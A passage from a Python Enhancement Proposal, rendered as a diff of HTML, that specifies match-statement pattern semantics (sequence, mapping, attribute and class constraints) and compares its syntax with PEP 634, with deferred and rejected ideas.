A sequence pattern fails if the subject value is not an instance of +collections.abc.Sequence. It also fails if the subject value is +an instance of str, bytes or bytearray (see Deferred Ideas for +a discussion on potentially removing the need for this special casing).

+

A sequence pattern may contain at most one star subpattern. The star +subpattern may occur in any position and is represented in the AST using the +MatchRestOfSequence node.

+

If no star subpattern is present, the sequence pattern is a fixed-length +sequence pattern; otherwise it is a variable-length sequence pattern.

+

A fixed-length sequence pattern fails if the length of the subject +sequence is not equal to the number of subpatterns.

+

A variable-length sequence pattern fails if the length of the subject +sequence is less than the number of non-star subpatterns.

+

The length of the subject sequence is obtained using the builtin +len() function (i.e., via the __len__ protocol). However, the +interpreter may cache this value in a similar manner as described for +value constraint expressions.

+

A fixed-length sequence pattern matches the subpatterns to +corresponding items of the subject sequence, from left to right. +Matching stops (with a failure) as soon as a subpattern fails. If all +subpatterns succeed in matching their corresponding item, the sequence +pattern succeeds.

+

A variable-length sequence pattern first matches the leading non-star +subpatterns to the corresponding items of the subject sequence, as for +a fixed-length sequence. If this succeeds, the star subpattern +matches a list formed of the remaining subject items, with items +removed from the end corresponding to the non-star subpatterns +following the star subpattern. The remaining non-star subpatterns are +then matched to the corresponding subject items, as for a fixed-length +sequence.

+

Subpatterns are mostly required to be closed patterns, but the parentheses may +be omitted for value constraints. Sequence elements may also be captured +unconditionally without parentheses.

+

Note: where PEP 634 allows all the same syntactic flexibility as iterable +unpacking in assignment statements, this PEP restricts sequence patterns +specifically to the square bracket form. Given that the open and parenthesised +forms are far more popular than square brackets for iterable unpacking, this +helps emphasise that iterable unpacking and sequence matching are not the +same operation. It also avoids the parenthesised form’s ambiguity problem +between single element sequence patterns and group patterns.

+
+
+

Mapping constraints

+

Surface syntax:

+
mapping_constraint: '{' [mapping_constraint_elements] '}'
+mapping_constraint_elements: ','.key_value_constraint+ ','?
+key_value_constraint:
+    | closed_expr pattern_as_clause
+    | closed_expr ':' simple_pattern
+    | double_star_capture
+double_star_capture: '**' pattern_as_clause
+
+
+

(Note that **__ is deliberately disallowed by this syntax, as additional +mapping entries are ignored by default)

+

closed_expr is defined above, under value constraints.

+

Abstract syntax:

+
MatchMapping(expr* keys, pattern* patterns)
+
+
+

Mapping constraints allow keys and values within a sequence to be checked and +values to optionally be extracted.

+

A mapping pattern fails if the subject value is not an instance of +collections.abc.Mapping.

+

A mapping pattern succeeds if every key given in the mapping pattern +is present in the subject mapping, and the pattern for +each key matches the corresponding item of the subject mapping.

+

The presence of keys is checked using the two argument form of the get +method and a unique sentinel value, which offers the following benefits:

+
    +
  • no exceptions need to be created in the lookup process
  • +
  • mappings that implement __missing__ (such as collections.defaultdict) +only match on keys that they already contain, they don’t implicitly add keys
  • +
+

A mapping pattern may not contain duplicate key values. If duplicate keys are +detected when checking the mapping pattern, the pattern is considered invalid, +and a ValueError is raised. While it would theoretically be possible to +checked for duplicated constant keys at compile time, no such check is currently +defined or implemented.

+

(Note: This semantic description is derived from the PEP 634 reference +implementation, which differs from the PEP 634 specification text at time of +writing. The implementation seems reasonable, so amending the PEP text seems +like the best way to resolve the discrepancy)

+

If a '**' as NAME double star pattern is present, that name is bound to a +dict containing any remaining key-value pairs from the subject mapping +(the dict will be empty if there are no additional key-value pairs).

+

A mapping pattern may contain at most one double star pattern, +and it must be last.

+

Value subpatterns are mostly required to be closed patterns, but the parentheses +may be omitted for value constraints (the : key/value separator is still +required to ensure the entry doesn’t look like an ordinary comparison operation).

+

Mapping values may also be captured unconditionally using the KEY as NAME +form, without either parentheses or the : key/value separator.

+
+
+

Instance attribute constraints

+

Surface syntax:

+
attrs_constraint:
+    | name_or_attr '{' [attrs_constraint_elements] '}'
+attrs_constraint_elements: ','.attr_value_pattern+ ','?
+attr_value_pattern:
+    | '.' NAME pattern_as_clause
+    | '.' NAME value_constraint
+    | '.' NAME ':' simple_pattern
+    | '.' NAME
+
+
+

Abstract syntax:

+
MatchAttrs(expr cls, identifier* attrs, pattern* patterns)
+
+
+

Instance attribute constraints allow an instance’s type to be checked and +attributes to optionally be extracted.

+

An instance attribute constraint may not repeat the same attribute name multiple +times. Attempting to do so will result in a syntax error.

+

An instance attribute pattern fails if the subject is not an instance of +name_or_attr. This is tested using isinstance().

+

If name_or_attr is not an instance of the builtin type, +TypeError is raised.

+

If no attribute subpatterns are present, the constraint succeeds if the +isinstance() check succeeds. Otherwise:

+
+
    +
  • Each given attribute name is looked up as an attribute on the subject.
      +
    • If this raises an exception other than AttributeError, +the exception bubbles up.
    • +
    • If this raises AttributeError the constraint fails.
    • +
    • Otherwise, the subpattern associated with the keyword is matched +against the attribute value. If no subpattern is specified, the wildcard +pattern is assumed. If this fails, the constraint fails. +If it succeeds, the match proceeds to the next attribute.
    • +
    +
  • +
  • If all attribute subpatterns succeed, the constraint as a whole succeeds.
  • +
+
+

Instance attribute constraints allow ducktyping checks to be implemented by +using object as the required instance type (e.g. +case object{.host as host, .port as port}:).

+

The syntax being proposed here could potentially also be used as the basis for +a new syntax for retrieving multiple attributes from an object instance in one +assignment statement (e.g. host, port = addr{.host, .port}). See the +Deferred Ideas section for further discussion of this point.

+
+
+

Class defined constraints

+

Surface syntax:

+
class_constraint:
+    | name_or_attr '(' ')'
+    | name_or_attr '(' positional_patterns ','? ')'
+    | name_or_attr '(' class_constraint_attrs ')'
+    | name_or_attr '(' positional_patterns ',' class_constraint_attrs] ')'
+positional_patterns: ','.positional_pattern+
+positional_pattern:
+    | simple_pattern
+    | pattern_as_clause
+class_constraint_attrs:
+    | '**' '{' [attrs_constraint_elements] '}'
+
+
+

Abstract syntax:

+
MatchClass(expr cls, pattern* patterns, identifier* extra_attrs, pattern* extra_patterns)
+
+
+

Class defined constraints allow a sequence of common attributes to be +specified on a class and checked positionally, rather than needing to specify +the attribute names in every related match pattern.

+

As for instance attribute patterns:

+
    +
  • a class defined pattern fails if the subject is not an instance of +name_or_attr. This is tested using isinstance().
  • +
  • if name_or_attr is not an instance of the builtin type, +TypeError is raised.
  • +
+

Regardless of whether or not any arguments are present, the subject is checked +for a __match_args__ attribute using the equivalent of +getattr(cls, "__match_args__", _SENTINEL)).

+

If this raises an exception the exception bubbles up.

+

If the returned value is not a list, tuple, or None, the conversion fails +and TypeError is raised at runtime.

+

This means that only types that actually define __match_args__ will be +usable in class defined patterns. Types that don’t define __match_args__ +will still be usable in instance attribute patterns.

+

If __match_args__ is None, then only a single positional subpattern is +permitted. Attempting to specify additional attribute patterns either +positionally or using the double star syntax will cause TypeError to be +raised at runtime.

+

This positional subpattern is then matched against the entire subject, allowing +a type check to be combined with another match pattern (e.g. checking both +the type and contents of a container, or the type and value of a number).

+

If __match_args__ is a list or tuple, then the class defined constraint is +converted to an instance attributes constraint as follows:

+
    +
  • if only the double star attribute constraints subpattern is present, matching +proceeds as if for the equivalent instance attributes constraint.
  • +
  • if there are more positional subpatterns than the length of +__match_args__ (as obtained using len()), TypeError is raised.
  • +
  • Otherwise, positional pattern i is converted to an attribute pattern +using __match_args__[i] as the attribute name.
  • +
  • if any element in __match_args__ is not a string, TypeError is raised.
  • +
  • once the positional patterns have been converted to attribute patterns, then +they are combined with any attribute constraints given in the double star +attribute constraints subpattern, and matching proceeds as if for the +equivalent instance attributes constraint.
  • +
+

Note: the __match_args__ is None handling in this PEP replaces the special +casing of bool, bytearray, bytes, dict, float, +frozenset, int, list, set, str, and tuple in PEP 634. +However, the optimised fast path for those types is retained in the +implementation.

+
+
+
+
+

Design Discussion

+
+

Requiring explicit qualification of simple names in match patterns

+

The first iteration of this PEP accepted the basic premise of PEP 634 that +iterable unpacking syntax would provide a good foundation for defining a new +syntax for pattern matching.

+

During the review process, however, two major and one minor ambiguity problems +were highlighted that arise directly from that core assumption:

+
    +
  • most problematically, when binding simple names by default is extended to +PEP 634’s proposed class pattern syntax, the ATTR=TARGET_NAME construct +binds to the right without using the as keyword, and uses the normal +assignment-to-the-left sigil (=) to do it!
  • +
  • when binding simple names by default is extended to PEP 634’s proposed mapping +pattern syntax, the KEY: TARGET_NAME construct binds to the right without +using the as keyword
  • +
  • using a PEP 634 capture pattern together with an AS pattern +(TARGET_NAME_1 as TARGET_NAME_2) gives an odd “binds to both the left and +right” behaviour
  • +
+

The third revision of this PEP accounted for this problem by abandoning the +alignment with iterable unpacking syntax, and instead requiring that all uses +of bare simple names for anything other than a variable lookup be qualified by +a preceding sigil or keyword:

+
    +
  • as NAME: local variable binding
  • +
  • .NAME: attribute lookup
  • +
  • == NAME: variable lookup
  • +
  • is NAME: variable lookup
  • +
  • any other usage: variable lookup
  • +
+

The key benefit of this approach is that it makes interpretation of simple names +in patterns a local activity: a leading as indicates a name binding, a +leading . indicates an attribute lookup, and anything else is a variable +lookup (regardless of whether we’re reading a subpattern or a subexpression).

+

With the syntax now proposed in this PEP, the problematic cases identified above +no longer read poorly:

+
    +
  • .ATTR as TARGET_NAME is more obviously a binding than ATTR=TARGET_NAME
  • +
  • KEY as TARGET_NAME is more obviously a binding than KEY: TARGET_NAME
  • +
  • (as TARGET_NAME_1) as TARGET_NAME_2 is more obviously two bindings than +TARGET_NAME_1 as TARGET_NAME_2
  • +
+
+
+

Resisting the temptation to guess

+

PEP 635 looks at the way pattern matching is used in other languages, and +attempts to use that information to make plausible predictions about the way +pattern matching will be used in Python:

+
    +
  • wanting to extract values to local names will probably be more common than +wanting to match against values stored in local names
  • +
  • wanting comparison by equality will probably be more common than wanting +comparison by identity
  • +
  • users will probably be able to at least remember that bare names bind values +and attribute references look up values, even if they can’t figure that out +for themselves without reading the documentation or having someone tell them
  • +
+

To be clear, I think these predictions actually are plausible. However, I also +don’t think we need to guess about this up front: I think we can start out with +a more explicit syntax that requires users to state their intent using a prefix +marker (either as, ==, or is), and then reassess the situation in a +few years based on how pattern matching is actually being used in Python.

+

At that point, we’ll be able to choose amongst at least the following options:

+
    +
  • deciding the explicit syntax is concise enough, and not changing anything
  • +
  • adding inferred identity constraints for one or more of None, ..., +True and False
  • +
  • adding inferred equality constraints for other literals (potentially including +complex literals)
  • +
  • adding inferred equality constraints for attribute lookups
  • +
  • adding either inferred equality constraints or inferred capture patterns for +bare names
  • +
+

All of those ideas could be considered independently on their own merits, rather +than being a potential barrier to introducing pattern matching in the first +place.

+

If any of these syntactic shortcuts were to eventually be introduced, they’d +also be straightforward to explain in terms of the underlying more explicit +syntax (the leading as, ==, or is would just be getting inferred +by the parser, without the user needing to provide it explicitly). At the +implementation level, only the parser should need to be change, as the existing +AST nodes could be reused.

+
+
+

Interaction with caching of attribute lookups in local variables

+

One of the major changes between this PEP and PEP 634 is to use == EXPR +for equality constraint lookups, rather than only offering NAME.ATTR. The +original motivation for this was to avoid the semantic conflict with regular +assignment targets, where NAME.ATTR is already used in assignment statements +to set attributes, so if NAME.ATTR were the only syntax for symbolic value +matching, then we’re pre-emptively ruling out any future attempts to allow +matching against single patterns using the existing assignment statement syntax. +The current motivation is more about the general desire to avoid guessing about +user’s intent, and instead requiring them to state it explicitly in the syntax.

+

However, even within match statements themselves, the name.attr syntax for +value patterns has an undesirable interaction with local variable assignment, +where routine refactorings that would be semantically neutral for any other +Python statement introduce a major semantic change when applied to a PEP 634 +style match statement.

+

Consider the following code:

+
while value < self.limit:
+    ... # Some code that adjusts "value"
+
+
+

The attribute lookup can be safely lifted out of the loop and only performed +once:

+
_limit = self.limit:
+while value < _limit:
+    ... # Some code that adjusts "value"
+
+
+

With the marker prefix based syntax proposal in this PEP, value constraints +would be similarly tolerant of match patterns being refactored to use a local +variable instead of an attribute lookup, with the following two statements +being functionally equivalent:

+
match expr:
+    case {"key": == self.target}:
+        ... # Handle the case where 'expr["key"] == self.target'
+    case __:
+        ... # Handle the non-matching case
+
+_target = self.target
+match expr:
+    case {"key": == _target}:
+        ... # Handle the case where 'expr["key"] == self.target'
+    case __:
+        ... # Handle the non-matching case
+
+
+

By contrast, when using PEP 634’s value and capture pattern syntaxes that omit +the marker prefix, the following two statements wouldn’t be equivalent at all:

+
# PEP 634's value pattern syntax
+match expr:
+    case {"key": self.target}:
+        ... # Handle the case where 'expr["key"] == self.target'
+    case _:
+        ... # Handle the non-matching case
+
+# PEP 634's capture pattern syntax
+_target = self.target
+match expr:
+    case {"key": _target}:
+        ... # Matches any mapping with "key", binding its value to _target
+    case _:
+        ... # Handle the non-matching case
+
+
+

This PEP ensures the original semantics are retained under this style of +simplistic refactoring: use == name to force interpretation of the result +as a value constraint, use as name for a name binding.

+

PEP 634’s proposal to offer only the shorthand syntax, with no explicitly +prefixed form, means that the primary answer on offer is “Well, don’t do that, +then, only compare against attributes in namespaces, don’t compare against +simple names”.

+

PEP 622’s walrus pattern syntax had another odd interaction where it might not +bind the same object as the exact same walrus expression in the body of the +case clause, but PEP 634 fixed that discrepancy by replacing walrus patterns +with AS patterns (where the fact that the value bound to the name on the RHS +might not be the same value as returned by the LHS is a standard feature common +to all uses of the “as” keyword).

+
+
+

Using existing comparison operators as the value constraint prefix

+

If the benefit of a dedicated value constraint prefix is accepted, then the +next question is to ask exactly what that prefix should be.

+

The initially published version of this PEP proposed using the previously +unused ? symbol as the prefix for equality constraints, and ?is as the +prefix for identity constraints. When reviewing the PEP, Steven D’Aprano +presented a compelling counterproposal [5] to use the existing comparison +operators (== and is) instead.

+

There were a few concerns with == as a prefix that kept it from being +chosen as the prefix in the initial iteration of the PEP:

+
    +
  • for common use cases, it’s even more visually noisy than ?, as a lot of +folks with PEP 8 trained aesthetic sensibilities are going to want to put +a space between it and the following expression, effectively making it a 3 +character prefix instead of 1
  • +
  • when used in a mapping pattern, there needs to be a space between the : +key/value separator and the == prefix, or the tokeniser will split them +up incorrectly (getting := and = instead of : and ==)
  • +
  • when used in an OR pattern, there needs to be a space between the | +pattern separator and the == prefix, or the tokeniser will split them +up incorrectly (getting |= and = instead of | and ==)
  • +
  • if used in a PEP 634 style class pattern, there needs to be a space between +the = keyword separator and the == prefix, or the tokeniser will split +them up incorrectly (getting == and = instead of = and ==)
  • +
+

Rather than introducing a completely new symbol, Steven’s proposed resolution to +this verbosity problem was to retain the ability to omit the prefix marker in +syntactically unambiguous cases.

+

While the idea of omitting the prefix marker was accepted for the second +revision of the proposal, it was dropped again in the third revision due to +ambiguity concerns. Instead, the following points apply:

+
    +
  • for class patterns, other syntax changes allow equality constraints to be +written as .ATTR == EXPR, and identity constraints to be written as +.ATTR is EXPR, both of which are quite easy to read
  • +
  • for mapping patterns, the extra syntactic noise is just tolerated (at least +for now)
  • +
  • for OR patterns, the extra syntactic noise is just tolerated (at least +for now). However, membership constraints may offer a future path to +reducing the need to combine OR patterns with equality constraints (instead, +the values to be checked against would be collected as a set, list, or tuple).
  • +
+

Given that perspective, PEP 635’s arguments against using ? as part of the +pattern matching syntax held for this proposal as well, and so the PEP was +amended accordingly.

+
+
+

Using __ as the wildcard pattern marker

+

PEP 635 makes a solid case that introducing ? solely as a wildcard pattern +marker would be a bad idea. With the syntax for value constraints changed +to use existing comparison operations rather than ? and ?is, that +argument holds for this PEP as well.

+

However, as noted by Thomas Wouters in [6], PEP 634’s choice of _ remains +problematic as it would likely mean that match patterns would have a permanent +difference from all other parts of Python - the use of _ in software +internationalisation and at the interactive prompt means that there isn’t really +a plausible path towards using it as a general purpose “skipped binding” marker.

+

__ is an alternative “this value is not needed” marker drawn from a Stack +Overflow answer [7] (originally posted by the author of this PEP) on the +various meanings of _ in existing Python code.

+

This PEP also proposes adopting an implementation technique that limits +the scope of the associated special casing of __ to the parser: defining a +new AST node type (MatchAlways) specifically for wildcard markers, rather +than passing it through to the AST as a Name node.

+

Within the parser, __ still means either a regular name or a wildcard +marker in a match pattern depending on where you were in the parse tree, but +within the rest of the compiler, Name("__") is still a normal variable name, +while MatchAlways() is always a wildcard marker in a match pattern.

+

Unlike _, the lack of other use cases for __ means that there would be +a plausible path towards restoring identifier handling consistency with the rest +of the language by making __ mean “skip this name binding” everywhere in +Python:

+
    +
  • in the interpreter itself, deprecate loading variables with the name __. +This would make reading from __ emit a deprecation warning, while writing +to it would initially be unchanged. To avoid slowing down all name loads, this +could be handled by having the compiler emit additional code for the +deprecated name, rather than using a runtime check in the standard name +loading opcodes.
  • +
  • after a suitable number of releases, change the parser to emit +a new SkippedBinding AST node for all uses of __ as an assignment +target, and update the rest of the compiler accordingly
  • +
  • consider making __ a true hard keyword rather than a soft keyword
  • +
+

This deprecation path couldn’t be followed for _, as there’s no way for the +interpreter to distinguish between attempts to read back _ when nominally +used as a “don’t care” marker, and legitimate reads of _ as either an +i18n text translation function or as the last statement result at the +interactive prompt.

+

Names starting with double-underscores are also already reserved for use by the +language, whether that is for compile time constants (i.e. __debug__), +special methods, or class attribute name mangling, so using __ here would +be consistent with that existing approach.

+
+
+

Representing patterns explicitly in the Abstract Syntax Tree

+

PEP 634 doesn’t explicitly discuss how match statements should be represented +in the Abstract Syntax Tree, instead leaving that detail to be defined as part +of the implementation.

+

As a result, while the reference implementation of PEP 634 definitely works (and +formed the basis of the reference implementation of this PEP), it does contain +a significant design flaw: despite the notes in PEP 635 that patterns should be +considered as distinct from expressions, the reference implementation goes ahead +and represents them in the AST as expression nodes.

+

The result is an AST that isn’t very abstract at all: nodes that should be +compiled completely differently (because they’re patterns rather than +expressions) are represented the same way, and the type system of the +implementation language (e.g. C for CPython) can’t offer any assistance in +keeping track of which subnodes should be ordinary expressions and which should +be subpatterns.

+

Rather than continuing with that approach, this PEP has instead defined a new +explicit “pattern” node in the AST, which allows the patterns and their +permitted subnodes to be defined explicitly in the AST itself, making the code +implementing the new feature clearer, and allowing the C compiler to provide +more assistance in keeping track of when the code generator is dealing with +patterns or expressions.

+

This change in implementation approach is actually orthogonal to the surface +syntax changes proposed in this PEP, so it could still be adopted even if the +rest of the PEP were to be rejected.

+
+
+

Changes to sequence patterns

+

This PEP makes one notable change to sequence patterns relative to PEP 634:

+
    +
  • only the square bracket form of sequence pattern is supported. Neither open +(no delimiters) nor tuple style (parentheses as delimiters) sequence patterns +are supported.
  • +
+

Relative to PEP 634, sequence patterns are also significantly affected by the +change to require explicit qualification of capture patterns and value +constraints, as it means case [a, b, c]: must instead be written as +case [as a, as b, as c]: and case [0, 1]: must instead be written as +case [== 0, == 1]:.

+

With the syntax for sequence patterns no longer being derived directly from the +syntax for iterable unpacking, it no longer made sense to keep the syntactic +flexibility that had been included in the original syntax proposal purely for +consistency with iterable unpacking.

+

Allowing open and tuple style sequence patterns didn’t increase expressivity, +only ambiguity of intent (especially relative to group patterns), and encouraged +readers down the path of viewing pattern matching syntax as intrinsically linked +to assignment target syntax (which the PEP 634 authors have stated multiple +times is not a desirable path to have readers take, and a view the author of +this PEP now shares, despite disagreeing with it originally).

+
+
+

Changes to mapping patterns

+

This PEP makes two notable changes to mapping patterns relative to PEP 634:

+
    +
  • value capturing is written as KEY as NAME rather than as KEY: NAME
  • +
  • a wider range of keys are permitted: any “closed expression”, rather than +only literals and attribute references
  • +
+

As discussed above, the first change is part of ensuring that all binding +operations with the target name to the right of a subexpression or pattern +use the as keyword.

+

The second change is mostly a matter of simplifying the parser and code +generator code by reusing the existing expression handling machinery. The +restriction to closed expressions is designed to help reduce ambiguity as to +where the key expression ends and the match pattern begins. This mostly allows +a superset of what PEP 634 allows, except that complex literals must be written +in parentheses (at least for now).

+

Adapting PEP 635’s mapping pattern examples to the syntax proposed in this PEP:

+
match json_pet:
+    case {"type": == "cat", "name" as name, "pattern" as pattern}:
+        return Cat(name, pattern)
+    case {"type": == "dog", "name" as name, "breed" as breed}:
+        return Dog(name, breed)
+    case __:
+        raise ValueError("Not a suitable pet")
+
+def change_red_to_blue(json_obj):
+    match json_obj:
+        case { 'color': (== 'red' | == '#FF0000') }:
+            json_obj['color'] = 'blue'
+        case { 'children' as children }:
+            for child in children:
+                change_red_to_blue(child)
+
+
+

For reference, the equivalent PEP 634 syntax:

+
match json_pet:
+    case {"type": "cat", "name": name, "pattern": pattern}:
+        return Cat(name, pattern)
+    case {"type": "dog", "name": name, "breed": breed}:
+        return Dog(name, breed)
+    case _:
+        raise ValueError("Not a suitable pet")
+
+def change_red_to_blue(json_obj):
+    match json_obj:
+        case { 'color': ('red' | '#FF0000') }:
+            json_obj['color'] = 'blue'
+        case { 'children': children }:
+            for child in children:
+                change_red_to_blue(child)
+
+
+
+
+

Changes to class patterns

+

This PEP makes several notable changes to class patterns relative to PEP 634:

+
    +
  • the syntactic alignment with class instantiation is abandoned as being +actively misleading and unhelpful. Instead, a new dedicated syntax for +checking additional attributes is introduced that draws inspiration from +mapping patterns rather than class instantiation
  • +
  • a new dedicated syntax for simple ducktyping that will work for any class +is introduced
  • +
  • the special casing of various builtin and standard library types is +supplemented by a general check for the existence of a __match_args__ +attribute with the value of None
  • +
+

As discussed above, the first change has two purposes:

+
    +
  • it’s part of ensuring that all binding operations with the target name to the +right of a subexpression or pattern use the as keyword. Using = to +assign to the right is particularly problematic.
  • +
  • it’s part of ensuring that all uses of simple names in patterns have a prefix +that indicates their purpose (in this case, a leading . to indicate an +attribute lookup)
  • +
+

The syntactic alignment with class instantion was also judged to be unhelpful +in general, as class patterns are about matching patterns against attributes, +while class instantiation is about matching call arguments to parameters in +class constructors, which may not bear much resemblance to the resulting +instance attributes at all.

+

The second change is intended to make it easier to use pattern matching for the +“ducktyping” style checks that are already common in Python.

+

The concrete syntax proposal for these patterns then arose from viewing +instances as mappings of attribute names to values, and combining the attribute +lookup syntax (.ATTR), with the mapping pattern syntax {KEY: PATTERN} +to give cls{.ATTR: PATTERN}.

+

Allowing cls{.ATTR} to mean the same thing as cls{.ATTR: __} was a +matter of considering the leading . sufficient to render the name usage +unambiguous (it’s clearly an attribute reference, whereas matching against a variable +key in a mapping pattern would be arguably ambiguous)

+

The final change just supplements a CPython-internal-only check in the PEP 634 +reference implementation by making it the default behaviour that classes get if +they don’t define __match_args__ (the optimised fast path for the builtin +and standard library types named in PEP 634 is retained).

+

Adapting the class matching example +linked from PEP 635 +shows that for purely positional class matching, the main impact comes from the +changes to value constraints and name binding, not from the class matching +changes:

+
match expr:
+    case BinaryOp(== '+', as left, as right):
+        return eval_expr(left) + eval_expr(right)
+    case BinaryOp(== '-', as left, as right):
+        return eval_expr(left) - eval_expr(right)
+    case BinaryOp(== '*', as left, as right):
+        return eval_expr(left) * eval_expr(right)
+    case BinaryOp(== '/', as left, as right):
+        return eval_expr(left) / eval_expr(right)
+    case UnaryOp(== '+', as arg):
+        return eval_expr(arg)
+    case UnaryOp(== '-', as arg):
+        return -eval_expr(arg)
+    case VarExpr(as name):
+        raise ValueError(f"Unknown value of: {name}")
+    case float() | int():
+        return expr
+    case __:
+        raise ValueError(f"Invalid expression value: {repr(expr)}")
+
+
+

For reference, the equivalent PEP 634 syntax:

+
match expr:
+    case BinaryOp('+', left, right):
+        return eval_expr(left) + eval_expr(right)
+    case BinaryOp('-', left, right):
+        return eval_expr(left) - eval_expr(right)
+    case BinaryOp('*', left, right):
+        return eval_expr(left) * eval_expr(right)
+    case BinaryOp('/', left, right):
+        return eval_expr(left) / eval_expr(right)
+    case UnaryOp('+', arg):
+        return eval_expr(arg)
+    case UnaryOp('-', arg):
+        return -eval_expr(arg)
+    case VarExpr(name):
+        raise ValueError(f"Unknown value of: {name}")
+    case float() | int():
+        return expr
+    case _:
+        raise ValueError(f"Invalid expression value: {repr(expr)}")
+
+
+

The changes to the class pattern syntax itself are more relevant when +checking for named attributes and extracting their values without relying on +__match_args__:

+
match expr:
+    case object{.host as host, .port as port}:
+        pass
+    case object{.host as host}:
+        pass
+
+
+

Compare this to the PEP 634 equivalent, where it really isn’t clear which names +are referring to attributes of the match subject and which names are referring +to local variables:

+
match expr:
+    case object(host=host, port=port):
+        pass
+    case object(host=host):
+        pass
+
+
+

In this specific case, that ambiguity doesn’t matter (since the attribute and +variable names are the same), but in the general case, knowing which is which +will be critical to reasoning correctly about the code being read.

+
+
+
+

Deferred Ideas

+
+

Inferred value constraints

+

As discussed above, this PEP doesn’t rule out the possibility of adding +inferred equality and identity constraints in the future.

+

These could be particularly valuable for literals, as it is quite likely that +many “magic” strings and numbers with self-evident meanings will be written +directly into match patterns, rather than being stored in named variables. +(Think constants like None, or obviously special numbers like 0 and +1, or strings where their contents are as descriptive as any variable name, +rather than cryptic checks against opaque numbers like 739452)

+
+
+

Making some required parentheses optional

+

The PEP currently errs heavily on the side of requiring parentheses in the face +of potential ambiguity.

+

However, there are a number of cases where it at least arguably goes too far, +mostly involving AS patterns with an explicit pattern.

+

In any position that requires a closed pattern, AS patterns may end up starting +with doubled parentheses, as the nested pattern is also required to be a closed +pattern: ((OPEN PTRN) as NAME)

+

Due to the requirement that the subpattern be closed, it should be reasonable +in many of these cases (e.g. sequence pattern subpatterns) to accept +CLOSED_PTRN as NAME directly.

+

Further consideration of this point has been deferred, as making required +parentheses optional is a backwards compatible change, and hence relaxing the +restrictions later can be considered on a case-by-case basis.

+
+
+

Accepting complex literals as closed expressions

+

PEP 634’s reference implementation includes a lot of special casing of binary +operations in both the parser and the rest of the compiler in order to accept +complex literals without accepting arbitrary binary numeric operations on +literal values.

+

Ideally, this problem would be dealt with at the parser layer, with the parser +directly emitting a Constant AST node prepopulated with a complex number. If +that was the way things worked, then complex literals could be accepted through +a similar mechanism to any other literal.

+

This isn’t how complex literals are handled, however. Instead, they’re passed +through to the AST as regular BinOp nodes, and then the constant folding +pass on the AST resolves them down to Constant nodes with a complex value.

+

For the parser to resolve complex literals directly, the compiler would need to +be able to tell the tokenizer to generate a distinct token type for +imaginary numbers (e.g. INUMBER), which would then allow the parser to +handle NUMBER + INUMBER and NUMBER - INUMBER separately from other +binary operations.

+

Alternatively, a new ComplexNumber AST node type could be defined, which +would allow the parser to notify the subsequent compiler stages that a +particular node should specifically be a complex literal, rather than an +arbitrary binary operation. Then the parser could accept NUMBER + NUMBER +and NUMBER - NUMBER for that node, while letting the AST validation for +ComplexNumber take care of ensuring that the real and imaginary parts of +the literal were real and imaginary numbers as expected.

+

For now, this PEP has postponed dealing with this question, and instead just +requires that complex literals be parenthesised in order to be used in value +constraints and as mapping pattern keys.

+
+
+

Allowing negated constraints in match patterns

+

With the syntax proposed in this PEP, it isn’t permitted to write != expr +or is not expr as a match pattern.

+

Both of these forms have clear potential interpretations as a negated equality +constraint (i.e. x != expr) and a negated identity constraint +(i.e. x is not expr).

+

However, it’s far from clear either form would come up often enough to justify +the dedicated syntax, so the possible extension has been deferred pending further +community experience with match statements.

+
+
+

Allowing membership checks in match patterns

+

The syntax used for equality and identity constraints would be straightforward +to extend to membership checks: in container.

+

One downside of the proposals in both this PEP and PEP 634 is that checking +for multiple values in the same case doesn’t look like any existing container +membership check in Python:

+
# PEP 634's literal patterns
+match value:
+    case 0 | 1 | 2 | 3:
+        ...
+
+# This PEP's equality constraints
+match value:
+    case == 0 | == 1 | == 2 | == 3:
+        ...
+
+
+

Allowing inferred equality constraints under this PEP would only make it look +like the PEP 634 example, it still wouldn’t look like the equivalent if +statement header (if value in {0, 1, 2, 3}:).

+

Membership constraints would provide a more explicit, but still concise, way +to check if the match subject was present in a container, and it would look +the same as an ordinary containment check:

+
match value:
+    case in {0, 1, 2, 3}:
+        ...
+    case in {one, two, three, four}:
+        ...
+    case in range(4): # It would accept any container, not just literal sets
+        ...
+
+
+

Such a feature would also be readily extensible to allow all kinds of case +clauses without any further syntax updates, simply by defining __contains__ +appropriately on a custom class definition.

+

However, while this does seem like a useful extension, and a good way to resolve +this PEP’s verbosity problem when combining multiple equality checks in an +OR pattern, it isn’t essential to making match statements a valuable addition +to the language, so it seems more appropriate to defer it to a separate proposal, +rather than including it here.

+
+
+

Inferring a default type for instance attribute constraints

+

The dedicated syntax for instance attribute constraints means that object +could be omitted from object{.ATTR} to give {.ATTR} without introducing +any syntactic ambiguity (if no class was given, object would be implied, +just as it is for the base class list in class definitions).

+

However, it’s far from clear saving six characters is worth making it harder to +visually distinguish mapping patterns from instance attribute patterns, so +allowing this has been deferred as a topic for possible future consideration.

+
+
+

Avoiding special cases in sequence patterns

+

Sequence patterns in both this PEP and PEP 634 currently special case str, +bytes, and bytearray as specifically never matching a sequence +pattern.

+

This special casing could potentially be removed if we were to define a new +collections.abc.AtomicSequence abstract base class for types like these, +where they’re conceptually a single item, but still implement the sequence +protocol to allow random access to their component parts.

+
+
+

Expression syntax to retrieve multiple attributes from an instance

+

The instance attribute pattern syntax has been designed such that it could +be used as the basis for a general purpose syntax for retrieving multiple +attributes from an object in a single expression:

+
host, port = obj{.host, .port}
+
+
+

Similar to slice syntax only being allowed inside bracket subscrpts, the +.attr syntax for naming attributes would only be allowed inside brace +subscripts.

+

This idea isn’t required for pattern matching to be useful, so it isn’t part of +this PEP. However, it’s mentioned as a possible path towards making pattern +matching feel more integrated into the rest of the language, rather than +existing forever in its own completely separated world.

+
+
+

Expression syntax to retrieve multiple attributes from an instance

+

If the brace subscript syntax were to be accepted for instance attribute +pattern matching, and then subsequently extended to offer general purpose +extraction of multiple attributes, then it could be extended even further to +allow for retrieval of multiple items from containers based on the syntax +used for mapping pattern matching:

+
host, port = obj{"host", "port"}
+first, last = obj{0, -1}
+
+
+

Again, this idea isn’t required for pattern matching to be useful, so it isn’t +part of this PEP. As with retrieving multiple attributes, however, it is +included as an example of the proposed pattern matching syntax inspiring ideas +for making object deconstruction easier in general.

+
+
+
+

Rejected Ideas

+
+

Restricting permitted expressions in value constraints and mapping pattern keys

+

While it’s entirely technically possible to restrict the kinds of expressions +permitted in value constraints and mapping pattern keys to just attribute +lookups and constant literals (as PEP 634 does), there isn’t any clear runtime +value in doing so, so this PEP proposes allowing any kind of primary expression +(primary expressions are an existing node type in the grammar that includes +things like literals, names, attribute lookups, function calls, container +subscripts, parenthesised groups, etc), as well as high precedence unary +operations (+, -, ~) on primary expressions.

+

